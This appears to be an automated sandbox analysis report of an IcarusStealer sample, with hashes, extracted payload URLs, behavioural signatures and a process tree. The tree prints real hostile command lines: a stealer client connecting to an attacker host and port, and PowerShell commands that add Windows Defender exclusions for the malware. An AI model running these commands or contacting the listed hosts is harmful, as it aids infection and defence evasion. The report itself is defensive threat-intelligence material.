Analysis
- max time kernel: 127s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 08/03/2024, 01:45
Static task: static1
Behavioral task: behavioral1
- Sample: switched_1.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: switched_1.exe
- Resource: win10v2004-20240226-en
General
- Target: switched_1.exe
- Size: 3.7MB
- MD5: b9bbe31d276de5c3d05352d070ae4244
- SHA1: 5e1bb67b01c579b4e0ad5a7475ceb657201c27ec
- SHA256: a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
- SHA512: 0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17
- SSDEEP: 49152:tYDJ4w53qs7fg442ZvkOlVdP8iFoh/dYINv7sq8:e4u3cV/gHP8X1hNv7
Malware Config
Extracted: icarusstealer
- payload_url:
  https://blackhatsec.org/add.jpg
  https://blackhatsec.org/remove.jpg
Signatures

IcarusStealer
Icarus is a modular stealer written in C#. First advertised in July 2022.

Modifies Installed Components in the registry (2 TTPs, 1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe

Executes dropped EXE (2 IoCs)
  pid | Process
  2964 | pulse x loader.exe
  2584 | tesetey.exe

Loads dropped DLL (2 IoCs)
  pid | Process
  2660 | switched_1.exe
  2660 | switched_1.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow | ioc
  3 | raw.githubusercontent.com
  5 | raw.githubusercontent.com

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  12 | ipinfo.io

Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 2584 set thread context of 2464 | 2584 | tesetey.exe | 41

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry class (5 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings | explorer.exe
  Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | explorer.exe
  Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | explorer.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | explorer.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | explorer.exe
Modifies system certificate store (2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | tesetey.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | tesetey.exe
Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid | Process
  2584 | tesetey.exe (5 occurrences)
  1724 | powershell.exe
  1924 | powershell.exe

Suspicious use of AdjustPrivilegeToken (15 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2584 | tesetey.exe
  Token: SeShutdownPrivilege | 2400 | explorer.exe
  Token: SeDebugPrivilege | 2464 | cvtres.exe
  Token: SeShutdownPrivilege | 2400 | explorer.exe (7 occurrences)
  Token: SeDebugPrivilege | 1924 | powershell.exe
  Token: SeDebugPrivilege | 1724 | powershell.exe
  Token: SeShutdownPrivilege | 2400 | explorer.exe (3 occurrences)

Suspicious use of FindShellTrayWindow (27 IoCs)
  pid | Process
  2400 | explorer.exe (27 occurrences)

Suspicious use of SendNotifyMessage (17 IoCs)
  pid | Process
  2400 | explorer.exe (17 occurrences)

Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target
  PID 2660 wrote to memory of 2964 | 2660 | switched_1.exe | 28 (4 occurrences)
  PID 2660 wrote to memory of 2584 | 2660 | switched_1.exe | 29 (4 occurrences)
  PID 2964 wrote to memory of 2548 | 2964 | pulse x loader.exe | 31 (3 occurrences)
  PID 2548 wrote to memory of 2652 | 2548 | cmd.exe | 33 (3 occurrences)
  PID 2548 wrote to memory of 2552 | 2548 | cmd.exe | 34 (3 occurrences)
  PID 2548 wrote to memory of 2424 | 2548 | cmd.exe | 35 (3 occurrences)
  PID 2584 wrote to memory of 1660 | 2584 | tesetey.exe | 36 (4 occurrences)
  PID 1660 wrote to memory of 2616 | 1660 | csc.exe | 37 (4 occurrences)
  PID 2584 wrote to memory of 2400 | 2584 | tesetey.exe | 38 (4 occurrences)
  PID 2584 wrote to memory of 2408 | 2584 | tesetey.exe | 39 (4 occurrences)
  PID 2584 wrote to memory of 2432 | 2584 | tesetey.exe | 40 (4 occurrences)
  PID 2584 wrote to memory of 2464 | 2584 | tesetey.exe | 41 (9 occurrences)
  PID 2400 wrote to memory of 292 | 2400 | explorer.exe | 42 (3 occurrences)
  PID 2464 wrote to memory of 2688 | 2464 | cvtres.exe | 43 (4 occurrences)
  PID 2464 wrote to memory of 1548 | 2464 | cvtres.exe | 45 (4 occurrences)
  PID 1548 wrote to memory of 1924 | 1548 | cmd.exe | 47 (4 occurrences)

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\switched_1.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\switched_1.exe"
  PID: 2660
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
    PID: 2964
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      PID: 2548
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\certutil.exe
        Command line: certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
        PID: 2652

      C:\Windows\system32\find.exe
        Command line: find /i /v "md5"
        PID: 2552

      C:\Windows\system32\find.exe
        Command line: find /i /v "certutil"
        PID: 2424

  C:\Users\Admin\AppData\Local\Temp\tesetey.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
    PID: 2584
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wfnlbhfv\wfnlbhfv.cmdline"
      PID: 1660
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B7C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8613C2DBF67B414E8A463426924CF2C1.TMP"
        PID: 2616

    C:\Windows\explorer.exe
      Command line: "C:\Windows\explorer.exe"
      PID: 2400
      - Modifies Installed Components in the registry
      - Modifies registry class
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\ctfmon.exe
        Command line: ctfmon.exe
        PID: 292

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      PID: 2408

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      PID: 2432

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      PID: 2464
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
        PID: 2688

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          PID: 1724
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
        PID: 1548
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
          PID: 1924
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 1KB
  MD5: b1ae4127bcb50359b0edcc52e0025e95
  SHA1: f87259f40ae67a73f2dee61851f89c153ba7113f
  SHA256: 1a067edecd3154053c742ed3cf341934a27f06f1918c3ac4011c4b6bc42f3b56
  SHA512: 4a1731ef205fae7545c126ca0b86654f531a52ca4a192ec3655b19f68a91ccaf0fd500306624b1525110777e48653d40fc9eecf636cc805f8f493c9aa586b805

- Filesize: 1.9MB
  MD5: e1f9a012841d02b6b01843c5c84a09f8
  SHA1: 857b63a05ba1b02d129eeb91efa7e3d8a6475958
  SHA256: 364a5b9255a40c5a8ba431d79abf37df8b278621f67fde99e054e16453d0cef7
  SHA512: 7571a3462239f31e206d652f69ae3edd89219023196bff7d55bb76217d2dfcb3b1e77061f4c0a4f9ab392ec3d6a2f778467128d7d0dcc26e76b1578d8b5d0c44

- Filesize: 2.4MB
  MD5: beecd7735af8503be2d5abdd0a1639a7
  SHA1: 93e53ce680eaa4cd54a9dfbd65cbe5abc3174d5b
  SHA256: e9c02b026697752d8fa535c5586bd7f4abaa899b5e5e2ec7840b8bfae38722b7
  SHA512: bc3787b31e6d8dc600245eee203256b9ca9800f21fab41f7d30542740728bb59218abe5e6ec3ec8469c855c0a963790f638ea2e2694024f4d57de3306a4070a0

- Filesize: 1KB
  MD5: e9144225655a1177485a6238f397718e
  SHA1: 0618d989814312c38b8005fc469222f891470642
  SHA256: f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d
  SHA512: 392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4

- Filesize: 1KB
  MD5: 14846c9faaef9299a1bf17730f20e4e6
  SHA1: 8083da995cfaa0e8e469780e32fcff1747850eb6
  SHA256: 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
  SHA512: 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

- Filesize: 448B
  MD5: cb9c6bc36d404c58941fbaaafbec7eb6
  SHA1: 8138f58b9f3e2b304e8ef6b24f9c43447e1fcc26
  SHA256: d342d9f407faa217db5dbb348bf947d91a5f073427884e4230e62d0c2eded14f
  SHA512: 4cd91754cf19da7795fc5b72c5e2757f6f54378c1b9731185c14f4948ae56e2c0f8b2d0b451bd857990b6b25e05f585dc47cac81ba55686fec80d28cd5ceaf7b

- Filesize: 2.6MB
  MD5: 93d03553eea24aba513c5ebd4432644d
  SHA1: 6f7f0b651a7c0e2775cb161edf10b0459e172a9f
  SHA256: 23e9fa0b264edcf4ecae8b0753752a529a03515fecec3b9502d3dbe40f773065
  SHA512: 032b9baa882bcfc4c4dd66fda52d083e6b69ee56f02bc5b9f1af74d7ae206d8e2656874e01ab71ee7ad178afb304e8924d9e43b948ee722db7e6d27e679dae4c

- Filesize: 494KB
  MD5: 0f0838bc6642dd6bc603368e50b4aba3
  SHA1: 932bd4d1c11996bf8ac3ac74a94b266e96d44c36
  SHA256: 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
  SHA512: a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860